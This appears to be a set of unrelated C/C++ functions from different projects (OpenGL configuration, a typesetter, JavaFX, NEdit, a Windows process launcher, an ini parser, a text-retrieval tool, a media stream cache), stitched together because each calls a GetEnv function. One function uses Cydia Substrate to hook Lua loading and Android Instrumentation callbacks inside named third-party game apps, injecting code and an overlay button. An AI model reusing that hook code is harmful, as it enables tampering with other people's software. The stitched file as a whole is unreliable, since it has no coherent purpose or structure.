enableEmuTexC = atoi(tmp)!=0; #endif #if REGAL_EMU_FILTER tmp = GetEnv( "REGAL_EMU_FILTER" ); if (tmp) enableEmuFilter = atoi(tmp)!=0; #endif // #if REGAL_EMU_PPA tmp = GetEnv( "REGAL_FORCE_EMU_PPA" ); if (tmp) forceEmuPpa = atoi(tmp)!=0; #endif #if REGAL_EMU_PPCA tmp = GetEnv( "REGAL_FORCE_EMU_PPCA" ); if (tmp) forceEmuPpca = atoi(tmp)!=0; #endif #if REGAL_EMU_OBJ tmp = GetEnv( "REGAL_FORCE_EMU_OBJ" ); if (tmp) forceEmuObj = atoi(tmp)!=0; #endif #if REGAL_EMU_BIN tmp = GetEnv( "REGAL_FORCE_EMU_BIN" ); if (tmp) forceEmuBin = atoi(tmp)!=0; #endif #if REGAL_EMU_TEXSTO tmp = GetEnv( "REGAL_FORCE_EMU_TEXSTO" ); if (tmp) forceEmuTexSto = atoi(tmp)!=0; #endif #if REGAL_EMU_XFER tmp = GetEnv( "REGAL_FORCE_EMU_XFER" ); if (tmp) forceEmuXfer = atoi(tmp)!=0; #endif #if REGAL_EMU_DSA tmp = GetEnv( "REGAL_FORCE_EMU_DSA" ); if (tmp) forceEmuDsa = atoi(tmp)!=0; #endif #if REGAL_EMU_RECT tmp = GetEnv( "REGAL_FORCE_EMU_RECT" ); if (tmp) forceEmuRect = atoi(tmp)!=0; #endif #if REGAL_EMU_IFF tmp = GetEnv( "REGAL_FORCE_EMU_IFF" ); if (tmp) forceEmuIff = atoi(tmp)!=0; #endif #if REGAL_EMU_SO tmp = GetEnv( "REGAL_FORCE_EMU_SO" ); if (tmp) forceEmuSo = atoi(tmp)!=0; #endif #if REGAL_EMU_VAO tmp = GetEnv( "REGAL_FORCE_EMU_VAO" ); if (tmp) forceEmuVao = atoi(tmp)!=0; #endif #if REGAL_EMU_TEXC tmp = GetEnv( "REGAL_FORCE_EMU_TEXC" ); if (tmp) forceEmuTexC = atoi(tmp)!=0; #endif #if REGAL_EMU_FILTER tmp = GetEnv( "REGAL_FORCE_EMU_FILTER" ); if (tmp) forceEmuFilter = atoi(tmp)!=0; #endif // tmp = GetEnv( "REGAL_FRAME_LIMIT" ); if (tmp) frameLimit = atoi(tmp); // tmp = GetEnv( "REGAL_MD5_COLOR" ); if (tmp) frameMd5Color = atoi(tmp)!=0; tmp = GetEnv( "REGAL_MD5_STENCIL" ); if (tmp) frameMd5Stencil = atoi(tmp)!=0; tmp = GetEnv( "REGAL_MD5_DEPTH" ); if (tmp) frameMd5Depth = atoi(tmp)!=0; tmp = GetEnv( "REGAL_MD5_COLOR_MASK" ); if (tmp) frameMd5ColorMask = static_cast<unsigned char>(atoi(tmp)); tmp = GetEnv( "REGAL_MD5_STENCIL_MASK" ); if (tmp) frameMd5StencilMask = static_cast<unsigned char>(atoi(tmp)); tmp = GetEnv( "REGAL_MD5_DEPTH_MASK" ); if (tmp) frameMd5DepthMask = atoi(tmp); // tmp = GetEnv( "REGAL_SAVE_COLOR" ); if (tmp) frameSaveColor = atoi(tmp)!=0; tmp = GetEnv( "REGAL_SAVE_STENCIL" ); if (tmp) frameSaveStencil = atoi(tmp)!=0; tmp = GetEnv( "REGAL_SAVE_DEPTH" ); if (tmp) frameSaveDepth = atoi(tmp)!=0; // Caching #if REGAL_CACHE tmp = GetEnv( "REGAL_CACHE" ); if (tmp) cache = atoi(tmp)!=0; // GLSL shader caching #if REGAL_CACHE_SHADER tmp = GetEnv( "REGAL_CACHE_SHADER" ); if (tmp) cacheShader = atoi(tmp)!=0; #endif #if REGAL_CACHE_SHADER_WRITE tmp = GetEnv( "REGAL_CACHE_SHADER_WRITE" ); if (tmp) cacheShaderWrite = atoi(tmp)!=0; #endif #if REGAL_CACHE_SHADER_READ tmp = GetEnv( "REGAL_CACHE_SHADER_READ" ); if (tmp) cacheShaderRead = atoi(tmp)!=0; #endif // Teture caching #if REGAL_CACHE_TEXTURE tmp = GetEnv( "REGAL_CACHE_TEXTURE" ); if (tmp) cacheTexture = atoi(tmp)!=0; #endif #if REGAL_CACHE_TEXTURE_WRITE tmp = GetEnv( "REGAL_CACHE_TEXTURE_WRITE" ); if (tmp) cacheTextureWrite = atoi(tmp)!=0; #endif #if REGAL_CACHE_TEXTURE_READ tmp = GetEnv( "REGAL_CACHE_TEXTURE_READ" ); if (tmp) cacheTextureRead = atoi(tmp)!=0; #endif tmp = GetEnv( "REGAL_CACHE_DIRECTORY" ); if (tmp) cacheDirectory = tmp; #endif #if REGAL_CODE tmp = GetEnv( "REGAL_CODE_SOURCE" ); if (tmp) codeSourceFile = tmp; tmp = GetEnv( "REGAL_CODE_HEADER" ); if (tmp) codeHeaderFile = tmp; #endif #endif #if REGAL_THREAD_LOCKING tmp = GetEnv( "REGAL_THREAD_LOCKING" ); if (tmp) enableThreadLocking = atoi(tmp)!=0; #else enableThreadLocking = false; #endif // REGAL_NO_EMULATION is deprecated, use REGAL_EMULATION=0 instead. #if REGAL_EMULATION && defined(REGAL_NO_EMULATION) && REGAL_NO_EMULATION enableEmulation = false; #endif #if REGAL_SYS_ES1 Info("REGAL_FORCE_ES1_PROFILE ", forceES1Profile ? "enabled" : "disabled"); #endif #if REGAL_SYS_ES2 Info("REGAL_FORCE_ES2_PROFILE ", forceES2Profile ? "enabled" : "disabled"); #endif Info("REGAL_FORCE_CORE_PROFILE ", forceCoreProfile ? "enabled" : "disabled"); #if REGAL_SYS_ES1 Info("REGAL_SYS_ES1 ", sysES1 ? "enabled" : "disabled"); #endif #if REGAL_SYS_ES2 Info("REGAL_SYS_ES2 ", sysES2 ? "enabled" : "disabled"); #endif #if REGAL_SYS_GL Info("REGAL_SYS_GL ", sysGL ? "enabled" : "disabled"); #endif #if REGAL_SYS_GLX Info("REGAL_SYS_GLX ", sysGLX ? "enabled" : "disabled"); #endif #if REGAL_SYS_EGL Info("REGAL_SYS_EGL ", sysEGL ? "enabled" : "disabled"); #endif Info("REGAL_FORCE_EMULATION ", forceEmulation ? "enabled" : "disabled"); #if REGAL_TRACE Info("REGAL_TRACE ", enableTrace ? "enabled" : "disabled"); #endif Info("REGAL_DEBUG ", enableDebug ? "enabled" : "disabled"); Info("REGAL_ERROR ", enableError ? "enabled" : "disabled"); #if REGAL_CODE Info("REGAL_CODE ", enableCode ? "enabled" : "disabled"); #endif Info("REGAL_EMULATION ", enableEmulation ? "enabled" : "disabled"); Info("REGAL_LOG ", enableLog ? "enabled" : "disabled"); Info("REGAL_DRIVER ", enableDriver ? "enabled" : "disabled"); Info("REGAL_EMU_PPA ", enableEmuPpa ? "enabled" : "disabled"); Info("REGAL_EMU_PPCA ", enableEmuPpca ? "enabled" : "disabled"); Info("REGAL_EMU_OBJ ", enableEmuObj ? "enabled" : "disabled"); Info("REGAL_EMU_BIN ", enableEmuBin ? "enabled" : "disabled"); Info("REGAL_EMU_TEXSTO ", enableEmuTexSto ? "enabled" : "disabled"); Info("REGAL_EMU_XFER ", enableEmuXfer ? "enabled" : "disabled"); Info("REGAL_EMU_DSA ", enableEmuDsa ? "enabled" : "disabled"); Info("REGAL_EMU_RECT ", enableEmuRect ? "enabled" : "disabled"); Info("REGAL_EMU_IFF ", enableEmuIff ? "enabled" : "disabled"); Info("REGAL_EMU_SO ", enableEmuSo ? "enabled" : "disabled"); Info("REGAL_EMU_VAO ", enableEmuVao ? "enabled" : "disabled"); Info("REGAL_EMU_FILTER ", enableEmuFilter ? "enabled" : "disabled"); Info("REGAL_EMU_TEXC ", enableEmuTexC ? "enabled" : "disabled"); Info("REGAL_FORCE_EMU_PPA ", forceEmuPpa ? "enabled" : "disabled"); Info("REGAL_FORCE_EMU_PPCA ", forceEmuPpca ? "enabled" : "disabled"); Info("REGAL_FORCE_EMU_OBJ ", forceEmuObj ? "enabled" : "disabled"); Info("REGAL_FORCE_EMU_BIN ", forceEmuBin ? "enabled" : "disabled"); Info("REGAL_FORCE_EMU_TEXSTO ", forceEmuTexSto ? "enabled" : "disabled"); Info("REGAL_FORCE_EMU_XFER ", forceEmuXfer ? "enabled" : "disabled"); Info("REGAL_FORCE_EMU_DSA ", forceEmuDsa ? "enabled" : "disabled"); Info("REGAL_FORCE_EMU_RECT ", forceEmuRect ? "enabled" : "disabled"); Info("REGAL_FORCE_EMU_IFF ", forceEmuIff ? "enabled" : "disabled"); Info("REGAL_FORCE_EMU_SO ", forceEmuSo ? "enabled" : "disabled"); Info("REGAL_FORCE_EMU_VAO ", forceEmuVao ? "enabled" : "disabled"); Info("REGAL_FORCE_EMU_FILTER ", forceEmuFilter ? "enabled" : "disabled"); Info("REGAL_FORCE_EMU_TEXC ", forceEmuTexC ? "enabled" : "disabled"); Info("REGAL_FRAME_LIMIT ", frameLimit ); Info("REGAL_MD5_COLOR ", frameMd5Color ? "enabled" : "disabled"); Info("REGAL_MD5_STENCIL ", frameMd5Stencil ? "enabled" : "disabled"); Info("REGAL_MD5_DEPTH ", frameMd5Depth ? "enabled" : "disabled"); Info("REGAL_SAVE_COLOR ", frameSaveColor ? "enabled" : "disabled"); Info("REGAL_SAVE_STENCIL ", frameSaveStencil ? "enabled" : "disabled"); Info("REGAL_SAVE_DEPTH ", frameSaveDepth ? "enabled" : "disabled"); #if REGAL_CACHE Info("REGAL_CACHE ", cache ? "enabled" : "disabled"); Info("REGAL_CACHE_TEXTURE ", cacheTexture ? "enabled" : "disabled"); Info("REGAL_CACHE_TEXTURE_WRITE ", cacheTextureWrite ? "enabled" : "disabled"); #endif #if REGAL_CODE Info("REGAL_CODE_SOURCE ", codeSourceFile ); Info("REGAL_CODE_HEADER ", codeHeaderFile ); #endif Info("REGAL_THREAD_LOCKING ", enableThreadLocking ? "enabled" : "disabled"); }
OBJECT ClosureExpand(OBJECT x, OBJECT env, BOOLEAN crs_wanted, OBJECT *crs, OBJECT *res_env) { OBJECT link, y, res, prnt_env, par, prnt; debug3(DCE, D, "[ ClosureExpand( %s, %s, %s, crs, res_env )", EchoObject(x), EchoObject(env), bool(crs_wanted)); assert( type(x) == CLOSURE, "ClosureExpand given non-CLOSURE!"); assert( predefined(actual(x)) == FALSE, "ClosureExpand given predefined!" ); /* add tag to x if needed but not provided; add cross-reference to crs */ if( has_tag(actual(x)) ) CrossAddTag(x); if( crs_wanted && has_tag(actual(x)) ) { OBJECT tmp = CopyObject(x, no_fpos); AttachEnv(env, tmp); y = CrossMake(actual(x), tmp, CROSS_TARG); New(tmp, CROSS_TARG); actual(tmp) = y; Link(tmp, y); if( *crs == nilobj ) New(*crs, CR_LIST); Link(*crs, tmp); } /* case x is a parameter */ res = *res_env = nilobj; if( is_par(type(actual(x))) ) { prnt = SearchEnv(env, enclosing(actual(x))); if( prnt != nilobj ) { prnt_env = GetEnv(prnt); for( link = Down(prnt); link != prnt; link = NextDown(link) ) { Child(par, link); if( type(par) == PAR && actual(par) == actual(x) ) { assert( Down(par) != par, "ExpandCLosure: Down(par)!"); Child(res, Down(par)); if( dirty(enclosing(actual(par))) || is_enclose(actual(par)) ) { debug2(DCE, DD, "copy %s %s", SymName(actual(par)), EchoObject(res)); res = CopyObject(res, no_fpos); } else { debug2(DCE, DD, "link %s %s", FullSymName(actual(par), AsciiToFull(".")), EchoObject(res)); DeleteLink(Down(par)); y = MakeWord(WORD, STR_NOCROSS, &fpos(res)); Link(par, y); } ReplaceNode(res, x); if( type(actual(x)) == RPAR && has_body(enclosing(actual(x))) ) { debug0(DCR, DDD, " calling SetEnv from ClosureExpand (a)"); *res_env = SetEnv(prnt, nilobj); DisposeObject(x); } else if( type(actual(x)) == NPAR && imports_encl(actual(x)) ) { debug0(DCR, DDD, " calling SetEnv from ClosureExpand (x)"); AttachEnv(env, x); *res_env = SetEnv(x, nilobj); } else { AttachEnv(env, x); debug0(DCR, DDD, " calling SetEnv from ClosureExpand (b)"); *res_env = SetEnv(x, prnt_env); } break; } } } else { /* fail only if there is no default value available */ if( sym_body(actual(x)) == nilobj ) { debug3(DCE, D, "failing ClosureExpand( %s, crs, %s, %s, res_env )", EchoObject(x), bool(crs_wanted), EchoObject(env)); Error(9, 2, "no value for parameter %s of symbol %s:", WARN, &fpos(x), SymName(actual(x)), SymName(enclosing(actual(x)))); Error(9, 1, "symbol with import list misused", FATAL, &fpos(x)); } } } /* case x is a user-defined symbol or default parameter */ if( res == nilobj ) { if( sym_body(actual(x)) == nilobj ) res = MakeWord(WORD, STR_NOCROSS, &fpos(x)); else res = CopyObject(sym_body(actual(x)), &fpos(x)); ReplaceNode(res, x); AttachEnv(env, x); debug0(DCR, DDD, " calling SetEnv from ClosureExpand (c)"); *res_env = SetEnv(x, nilobj); } assert( *res_env!=nilobj && type(*res_env)==ENV, "ClosureExpand: *res_env!"); debug0(DCE, D, "] ClosureExpand returning, res ="); ifdebug(DCE, D, DebugObject(res)); debug1(DCE, D, " environment = %s", EchoObject(*res_env)); return res; } /* end ClosureExpand */
LRESULT GlassApplication::WindowProc(UINT msg, WPARAM wParam, LPARAM lParam) { switch (msg) { case WM_DO_ACTION: case WM_DO_ACTION_LATER: { Action * action = (Action *)wParam; action->Do(); if (msg == WM_DO_ACTION_LATER) { delete action; } } return 0; case WM_CREATE: pInstance = this; STRACE(_T("GlassApplication: created.")); break; case WM_DESTROY: //Alarm clipboard dispose if any. //Please, use RegisterClipboardViewer(NULL) instead of UnregisterClipboardViewer. RegisterClipboardViewer(NULL); return 0; case WM_NCDESTROY: // pInstance is deleted in BaseWnd::StaticWindowProc pInstance = NULL; STRACE(_T("GlassApplication: destroyed.")); return 0; case WM_CHANGECBCHAIN: if ((HWND)wParam == m_hNextClipboardView) { m_hNextClipboardView = (HWND)lParam; } else if (NULL != m_hNextClipboardView) { ::SendMessage(m_hNextClipboardView, WM_CHANGECBCHAIN, wParam, lParam); } break; case WM_DRAWCLIPBOARD: if (NULL != m_clipboard) { GetEnv()->CallVoidMethod(m_clipboard, midContentChanged); CheckAndClearException(GetEnv()); } if (NULL != m_hNextClipboardView) { ::SendMessage(m_hNextClipboardView, WM_DRAWCLIPBOARD, wParam, lParam); } break; case WM_SETTINGCHANGE: if ((UINT)wParam != SPI_SETWORKAREA) { break; } // Fall through case WM_DISPLAYCHANGE: GlassScreen::HandleDisplayChange(); break; case WM_THEMECHANGED: { JNIEnv* env = GetEnv(); jstring themeName = GlassApplication::GetThemeName(env); jboolean result = env->CallBooleanMethod(m_grefThis, javaIDs.Application.notifyThemeChangedMID, themeName); if (CheckAndClearException(env)) return 1; return !result; } } return ::DefWindowProc(GetHWND(), msg, wParam, lParam); }
// ------------------------------------------------------------------------- // Returns a pointer to the name of an rc file of the requested type. // // Preconditions: // - MAXPATHLEN is set to the max. allowed path length // - fullPath points to a buffer of at least MAXPATHLEN // // Returns: // - NULL if an error occurs while creating a directory // - Pointer to a static array containing the file name // ------------------------------------------------------------------------- const char* GetRCFileName(FileTypes type) { static std::string rcFiles[N_FILE_TYPES]; static bool namesDetermined = false; if (!namesDetermined) { std::string nedit_home = GetEnv("NEDIT_HOME"); if (nedit_home.empty()) { // No NEDIT_HOME // Let's try if ~/.nedit is a regular file or not. std::string legacyFile = buildFilePath(GetHomeDir(), hiddenFileNames[NEDIT_RC]); if (isRegFile(legacyFile)) { // This is a legacy setup with rc files in $HOME for (int i = 0; i < N_FILE_TYPES; i++) { rcFiles[i] = buildFilePath(GetHomeDir(), hiddenFileNames[i]); } } else { // ${HOME}/.nedit does not exist as a regular file. // FIXME: Devices, sockets and fifos are ignored for now. std::string defaultNEditHome = buildFilePath(GetHomeDir(), DEFAULT_NEDIT_HOME); if (!isDir(defaultNEditHome)) { /* Create DEFAULT_NEDIT_HOME */ #ifdef WIN32 if (mkdir(defaultNEditHome.c_str()) != 0) #else if (mkdir(defaultNEditHome.c_str(), 0777) != 0) #endif { perror("nedit: Error while creating rc file directory" " $HOME/" DEFAULT_NEDIT_HOME "\n" " (Make sure all parent directories exist.)"); return NULL; } } /* All set for DEFAULT_NEDIT_HOME, let's copy the names */ for (int i = 0; i < N_FILE_TYPES; i++) { rcFiles[i] = buildFilePath(defaultNEditHome.c_str(), plainFileNames[i]); } } } else { // $NEDIT_HOME is set. // FIXME: Is this required? Does VMS know stat(), mkdir()? if (!isDir(nedit_home)) { /* Create $NEDIT_HOME */ #ifdef WIN32 if (mkdir(nedit_home.c_str()) != 0) #else if (mkdir(nedit_home.c_str(), 0777) != 0) #endif { perror("nedit: Error while creating rc file directory $NEDIT_HOME\n" "nedit: (Make sure all parent directories exist.)"); return NULL; } } // All set for NEDIT_HOME, let's copy the names for (int i = 0; i < N_FILE_TYPES; i++) { rcFiles[i] = buildFilePath(nedit_home.c_str(), plainFileNames[i]); } } namesDetermined = true; } return rcFiles[type].c_str(); }
ENTER_MAIN_THREAD() { GetEnv()->CallVoidMethod(runnable, javaIDs.Runnable.run); CheckAndClearException(GetEnv()); }
DWORD DosWindowThread(void *xx) { struct _varData *vdata = (struct _varData *)xx; char *xcmd = GetCmd(); if (xcmd) { BOOL bSeenInitialBP = FALSE; BOOL bContinue = TRUE; DWORD dwContinueStatus; BOOL bShownExitCode = FALSE; DEBUG_EVENT stDE; LPTCH env = GetEnv(); BOOL bRet; STARTUPINFO stStartInfo; PROCESS_INFORMATION stProcessInfo; DWORD exitCode; char wd[MAX_PATH], *p, cmd[MAX_PATH]; if (vdata->path) { strcpy(wd, vdata->path); p = strrchr(wd, '\\'); if (p) if (p[-1] == ':') p[1] = 0; else p[0] = 0; else wd[0] = 0; } else GetCurrentDirectory(sizeof(wd), wd); if (vdata->exec) { sprintf(cmd,"\"%s\" %s", vdata->exec, vdata->args); } else { sprintf(cmd, "\"%s\"", xcmd); } memset(&stStartInfo, 0, sizeof(STARTUPINFO)); memset(&stProcessInfo, 0, sizeof(PROCESS_INFORMATION)); stStartInfo.cb = sizeof(STARTUPINFO); bRet = CreateProcess(NULL, cmd, NULL, NULL, TRUE, DEBUG_PROCESS | DEBUG_ONLY_THIS_PROCESS | CREATE_NEW_CONSOLE, env, wd, &stStartInfo, &stProcessInfo); if (!bRet) { FreeEnv(env); ExtendedMessageBox("Command Execution", MB_SETFOREGROUND | MB_SYSTEMMODAL, "Could not execute %s.", cmd); return 0; } ProcessToTop(stProcessInfo.dwProcessId); while (TRUE == bContinue) { // Pause until a debug event notification happens. bContinue = WaitForDebugEvent(&stDE, 200); if (bContinue) { switch (stDE.dwDebugEventCode) { case CREATE_PROCESS_DEBUG_EVENT: CloseHandle(stDE.u.CreateProcessInfo.hFile); dwContinueStatus = DBG_CONTINUE; break; case CREATE_THREAD_DEBUG_EVENT: case LOAD_DLL_DEBUG_EVENT: case UNLOAD_DLL_DEBUG_EVENT: case OUTPUT_DEBUG_STRING_EVENT: case RIP_EVENT: dwContinueStatus = DBG_CONTINUE; break; case EXIT_THREAD_DEBUG_EVENT: // this catches the X button at the top right of the window. // if it was pressed we do the dialog here to prevent the original window // from auto-closing before we show it. if (stDE.u.ExitThread.dwExitCode == STATUS_CONTROL_C_EXIT) { if (!bShownExitCode) { if (vdata->rvTitle) { ExtendedMessageBox(vdata->rvTitle, MB_SETFOREGROUND | MB_SYSTEMMODAL, vdata->rvBody, stDE.u.ExitProcess.dwExitCode); bShownExitCode = TRUE; } } } dwContinueStatus = DBG_CONTINUE; break; case EXIT_PROCESS_DEBUG_EVENT: if (!bShownExitCode) { if (vdata->rvTitle) { ExtendedMessageBox(vdata->rvTitle, MB_SETFOREGROUND | MB_SYSTEMMODAL, vdata->rvBody, stDE.u.ExitProcess.dwExitCode); bShownExitCode = TRUE; } } dwContinueStatus = DBG_CONTINUE; bContinue = FALSE; break; case EXCEPTION_DEBUG_EVENT: switch (stDE.u.Exception.ExceptionRecord.ExceptionCode) { default: dwContinueStatus = DBG_EXCEPTION_NOT_HANDLED; break; case EXCEPTION_BREAKPOINT: if (!bSeenInitialBP) { bSeenInitialBP = TRUE; dwContinueStatus = DBG_CONTINUE; } else { dwContinueStatus = DBG_EXCEPTION_NOT_HANDLED; } break; } break; // For any other events, just continue on. default: dwContinueStatus = DBG_EXCEPTION_NOT_HANDLED; break; } // Pass on to the operating system. ContinueDebugEvent(stDE.dwProcessId, stDE.dwThreadId, dwContinueStatus); } else { dwContinueStatus = DBG_CONTINUE; bContinue = TRUE; } } CloseHandle(stProcessInfo.hProcess); CloseHandle(stProcessInfo.hThread); FreeEnv(env); } free(vdata->rvTitle); free(vdata->rvBody); free(vdata->path); free(vdata->exec); free(vdata->args); free(vdata); return 0; }
static void LoadIniStream(Stream& in, VectorMap<String, String>& key, const char *sfile) { bool env = false; while(!in.IsEof()) { String line = in.GetLine(); CParser p(line); if(p.IsId()) { String k = p.ReadId(); if(p.Char('=')) { String h = TrimBoth((String)p.GetSpacePtr()); if(env) { String hh; const char *s = ~h; while(*s) { if(*s == '$') { s++; if(*s == '$') { hh.Cat('$'); s++; } else { String id; if (*s == '{') { while(*++s != '}') id.Cat(*s); s++; } else { while(iscid(*s)) id.Cat(*s++); } hh.Cat(GetEnv(id)); } } else hh.Cat(*s++); } key.Add(k, hh); } else key.Add(k, h); } } else if(p.Char('@')) { if(p.Id("include")) { String fn = p.GetPtr(); if(!IsFullPath(fn) && sfile) fn = AppendFileName(GetFileFolder(GetFullPath(sfile)), fn); LoadIniFile(fn, key); } else if(p.Id("end")) return; else if(p.Id("replace-env")) env = true; else if(p.Id("ignore-env")) env = false; } } }
JNIEXPORT jint JNICALL JNI_OnLoad(JavaVM* vm, void* reserved) { if(intifinit) { return JNI_VERSION_1_6; } intifinit = 1; MSImageRef image_time; image_time = MSGetImageByName("/system/lib/libc.so"); int (*gettimeofday_org)(struct timeval*tv, struct timezone *tz); gettimeofday_org = (int (*)(struct timeval*tv, struct timezone *tz)) MSFindSymbol(image_time, "gettimeofday"); int (*clock_gettime_org)(clockid_t clk_id,struct timespec *tp); clock_gettime_org = (int (*)(clockid_t clk_id,struct timespec *tp)) MSFindSymbol(image_time, "clock_gettime"); //MSHookFunction((void *)gettimeofday_org, (void*)gettimeofday_hook, (void**)&gettimeofday_f); //MSHookFunction((void *)clock_gettime_org, (void*)clock_gettime_hook, (void**)&clock_gettime_f); MSImageRef image; image = MSGetImageByName("/data/data/com.babeltime.fknsango_gwphone/lib/libgame.so"); LOGD("image is %d" , image) ; void *(*lua_loadbuffer_org_sym)(void *, char *s, long len,void *s2,void *s5); lua_loadbuffer_org_sym = (void * (*)(void *, char *s, long len,void *s2,void *s5)) MSFindSymbol(image, "luaL_loadbufferx"); //lua_gettop =(int (*) (void*)) MSFindSymbol(image, "lua_gettop") ; lua_pcall= (int (*) (void *L, int nargs, int nresults, int errfunc))MSFindSymbol(image, "lua_pcall") ; lua_gettop= (int (*) (void *L))MSFindSymbol(image, "lua_gettop") ; lua_type= (int (*)(void *L,int i))MSFindSymbol(image, "lua_type") ; lua_typename= (char* (* )(void *L, int a2))MSFindSymbol(image, "lua_typename") ; lua_tolstring= (char* (*)(void *L, signed int a2, int a3))MSFindSymbol(image, "lua_tolstring") ; _Z17getPackageNameJNIv = ( char* (* )(std::string &s )) MSFindSymbol(image, "_Z17getPackageNameJNIv"); ; _ZN7cocos2d18CCFileUtilsAndroid15getWritablePathEv = (std::string (*)(int a1)) MSFindSymbol(image,"_ZN7cocos2d18CCFileUtilsAndroid15getWritablePathEv") ; MSHookFunction((void *)_ZN7cocos2d18CCFileUtilsAndroid15getWritablePathEv, (void*)my_ZN7cocos2d18CCFileUtilsAndroid15getWritablePathEv, (void**)&_ZN7cocos2d18CCFileUtilsAndroid15getWritablePathEv); //lua_getfield = ( void (*) (void *L, int index, const char *k)) MSFindSymbol(image, "lua_getfield") ; //MSHookFunction( (void *)lua_getfield,(void*)mylua_getfield,(void**)&lua_getfield); if(lua_loadbuffer_org_sym != NULL) { //LOGD("lua_pushlstring_org_sym is %p!!!!!!!!!!!!\n",lua_loadbuffer_org_sym); MSHookFunction((void *)lua_loadbuffer_org_sym, (void*)lua_loadbuffer_hook, (void**)&lua_loadbuffer_f); } else { // LOGD("lua_pushlstring_org no find!!!!!!!!!!!!!!!!!!\n"); } //以下为hook java的,为了显示按钮 JNIEnv *env = GetEnv(vm); MSImageRef dvm_image = MSGetImageByName("/system/lib/libc.so"); void *gp = dlopen("/data/data/com.youzu.snsgz.linyou.youmi/lib/libsubstrate-dvm.so",RTLD_LAZY); cydia_dvm_image = MSGetImageByName("/data/data/sh.lilith.dgame.lemon/lib/libsubstrate-dvm.so"); LOGD("dlopen %d , dvm %d" , gp , cydia_dvm_image) ; jclass gameutil = env->FindClass("com/youzu/sanguohero/GameUtils"); jmethodID getBRAND = env->GetStaticMethodID( gameutil, "getBRAND","()Ljava/lang/String;"); jstring jstr = (jstring)env->CallStaticObjectMethod( gameutil,getBRAND); const char* str; str = env->GetStringUTFChars(jstr, false); LOGD("getBRAND %s" , str) ; if( strstr(str,"Meizu") != NULL) { return JNI_VERSION_1_6 ; } find_method = (void (*)(JNIEnv *, jclass , jmethodID , void *, void **)) MSFindSymbol(cydia_dvm_image, "MSJavaHookMethod"); const char *target_class = "android/app/Instrumentation";//对大部分app来说,这是一个父类 jvm_org = vm; jclass clazzTarget = env->FindClass(target_class); const char *fun_show = "init",*fun_hid = "hidden"; javaClientClass_org = env->FindClass("com/youzu/sanguohero/TestWM"); inject_method_show = env->GetStaticMethodID(javaClientClass_org, fun_show, "(Landroid/app/Activity;)V"); inject_method_hidden = env->GetStaticMethodID(javaClientClass_org, fun_hid, "(Landroid/app/Activity;)V"); //显示按钮 jmethodID method_resume = env->GetMethodID(clazzTarget, "callActivityOnResume", "(Landroid/app/Activity;)V" ); //隐藏按钮 jmethodID method_pause = env->GetMethodID(clazzTarget, "callActivityOnPause", "(Landroid/app/Activity;)V" ); find_method(env, clazzTarget, method_resume, reinterpret_cast<void *>(&newCodejava_show),reinterpret_cast<void **>(&oldCode_java_show)); find_method(env, clazzTarget, method_pause, reinterpret_cast<void *>(&newCodejava_hidden),reinterpret_cast<void **>(&oldCode_java_hidden)); DetachCurrent(vm); return JNI_VERSION_1_6; }
/* files. Then calls query () to perform the querying. */ int main (int argc, char **argv) { ProgTime StartTime; int decomp = 0; int ch; msg_prefix = argv[0]; GetTime (&StartTime); /* Initialise the environment with default values */ InitEnv (); read_mgrc_file (); OutFile = stdout; InFile = stdin; opterr = 0; while ((ch = getopt (argc, argv, "Df:d:h")) != -1) switch (ch) { case 'f': SetEnv ("mgname", optarg, NULL); break; case 'd': SetEnv ("mgdir", optarg, NULL); break; case 'D': decomp = 1; break; case 'h': case '?': fprintf (stderr, "usage: %s [-D] [-f base name of collection]" "[-d data directory] [collection]\n", argv[0]); exit (1); } PushEnv (); if (decomp == 0) { Init_ReadLine (); /* write a first prompt, let the user start thinking */ if (!BooleanEnv (GetEnv ("expert"), 0) && isatty (fileno (InFile))) { fprintf (stderr, "\n\n\t FULL TEXT RETRIEVAL QUERY PROGRAM\n"); fprintf (stderr, "%24s%s\n\n", "", *"30 Jul 1999" == '%' ? __DATE__ : "30 Jul 1999"); fprintf (stderr, "\n"); fprintf (stderr, " mgquery version " VERSION ", Copyright (C) 1994 Neil Sharman\n"); fprintf (stderr, " mgquery comes with ABSOLUTELY NO WARRANTY; for details type `.warranty'\n"); fprintf (stderr, " This is free software, and you are welcome to redistribute it\n"); fprintf (stderr, " under certain conditions; type `.conditions' for details.\n"); fprintf (stderr, "\n"); } } if (optind < argc) search_for_collection (argv[optind]); if (decomp == 0) { query (); } else { int i; InitQueryTimes iqt; query_data *qd; qd = InitQuerySystem (GetDefEnv ("mgdir", "./"), GetDefEnv ("mgname", ""), &iqt); if (!qd) FatalError (1, mg_errorstrs[mg_errno], mg_error_data); start_up_stats (qd, iqt); Display_Stats (stderr); for (i = 0; i < qd->td->cth.num_of_docs; i++) { RawDocOutput (qd, i + 1, stdout); putc ('\2', stdout); } Message ("%s", ElapsedTime (&StartTime, NULL)); FinishQuerySystem (qd); } UninitEnv (); exit (0); }
static int stream_cache_open (stream_wrapper_t * wrapper,char *stream_name) { int ret = 0; stream_ctrl_t *info = &wrapper->info; memset(info,0,sizeof(*info)); //open real stream stream_wrapper_t *real_st = (stream_wrapper_t *)wrapper->stream_priv; ret = real_st->open(real_st,stream_name); if(ret != DTERROR_NONE) { ret = DTERROR_FAIL; goto ERR0; } memcpy(info,&real_st->info,sizeof(stream_ctrl_t)); // ctx //get buf size char value[512]; int cache_size = DEFAULT_CACHE_SIZE; if(GetEnv("STREAM","stream.cachesize",value) > 0) { cache_size = atoi(value); dt_info(TAG,"cache size:%d \n",cache_size); } else dt_info(TAG,"cache size not set, use default:%d \n",cache_size); cache_ctx_t *ctx = (cache_ctx_t *)malloc(sizeof(cache_ctx_t)); if(!ctx) { dt_info(TAG,"cache_ctx_t malloc failed, ret\n"); ret = DTERROR_FAIL; goto ERR1; } memset(ctx,0,sizeof(cache_ctx_t)); ctx->wrapper = real_st; // get tmp buffer ctx->cache = create_cache(cache_size,f_pre); if(!ctx->cache) { ret = DTERROR_FAIL; goto ERR2; } wrapper->stream_priv = ctx; //start read thread ret = create_cache_thread(ctx); if (ret == -1) { dt_error (TAG "file:%s [%s:%d] data fill thread start failed \n", __FILE__, __FUNCTION__, __LINE__); goto ERR3; } return DTERROR_NONE; ERR3: release_cache(ctx->cache); ERR2: free(ctx); ERR1: real_st->close(real_st); ERR0: return ret; }
